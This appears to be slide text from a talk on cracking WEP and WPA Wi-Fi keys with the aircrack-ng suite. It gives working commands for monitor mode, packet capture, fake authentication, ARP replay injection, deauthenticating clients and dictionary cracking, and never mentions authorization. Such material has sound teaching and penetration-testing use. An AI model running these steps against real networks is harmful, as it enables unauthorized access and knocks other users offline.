Wireless Cracking
By:
Christopher Zacky
aircrack-ng Suite

http://www.aircrack-ng.org

airodump-ng




Capture packets
airmon-ng

Put your wireless card into monitor mode

I just use iwconfig for this
aireplay-ng

Do fake authentications

ARP replay requests

De-authenticate other clients
aircrack-ng

To crack the key
WEP and WPA


WEP key... relatively easy to crack

Don't use WEP, wtf is wrong with you

ARP replay request
WPA key... not as easy, but still possible
especially if your password is lame

You need to capture a handshake

Can only be done with brute force, which is a
dictionary-based attack
What do you need?


aircrack-ng

It's free and open source

Some linux distributions come with it installed
(like backtrack, or pentoo)
Wireless card

Needs to be able to go into monitor mode
(sometimes Windows has a problem with that)

Needs to be capable of wireless injection

Just because you are close enough to receive
wireless packets, does not mean you are
close enough to send them
WEP Crack - Concepts




http://www.aircrack-ng.org/doku.php?
id=simple_wep_crack
Uses tens of thousands of initialization vectors
(IVs)
The process is sped up through injection
aircrack-ng runs an algorithm on the captured
IVs to crack the key
WEP Crack - Overview


Find the essid, channel, and mac address of the
access point using airodump-ng
Put wireless card in monitor mode and begin
listening on the correct channel

Your will be recording packets into a file

Do a fake authentication with the access point

Put aireplay-ng ARP replay request mode

Capture lots of packets


I wait till I have 100,000
Run aircrack-ng and crack the key!
airodump-ng

airodump-ng <device_name>




airodump-ng wlan0
Write down the essid, channel, and mac
address
Using screen helps a lot
Also, use ifconfig and write down your wireless
card's mac address... you'll need it later
Monitor Mode

Some people use airmon-ng... I don't


You need to be on the right channel before you
start capturing packets



I use iwconfig
Use airodump-ng to find the right channel
Managed mode = regular mode
Monitor mode = what we want to do WEP
cracking

iwconfig to change channel

ifconfig to turn interface on/off
Enabling Monitor Mode on the Right
Channel

ifconfig wlan0 down

iwconfig wlan0 mode managed

ifconfig wlan0 up

iwconfig wlan0 channel 6

ifconfig wlan0 down

iwconfig wlan0 mode monitor

ifconfig wlan0 up
The commands

airodump-ng -c <channel> --bssid <network_name> w <file_name> <device_name>


aireplay-ng -1 0 -e <essid> -a <bssid> -h
<my_mac_address> <device_name>


Do a fake authentication
aireplay-ng -3 -b <bssid> -h <my_mac_address>
<device_name>


Start capturing packets
Begin packet injection
aircrack-ng <file_name>

Crack the WEP key
WPA Crack - Overview

Can only be done via brute force

You need to capture a handshake



Wait for someone to connect

Find someone who is connected and de-auth
them
Run the captured handshake against a
dictionary
You will only crack the key if it is in the
dictionary you are using
WPA crack

airodump-ng -c <channel> --bssid <network_name> w <file_name> <device_name>


aireplay-ng -0 1 -a <bssid> -c <client_mac_address>
<device_name>


Start capturing packets
De-authenticate the client
aircrack-ng -w <password_list> -b <bssid>
<file_name>

Crack the WPA key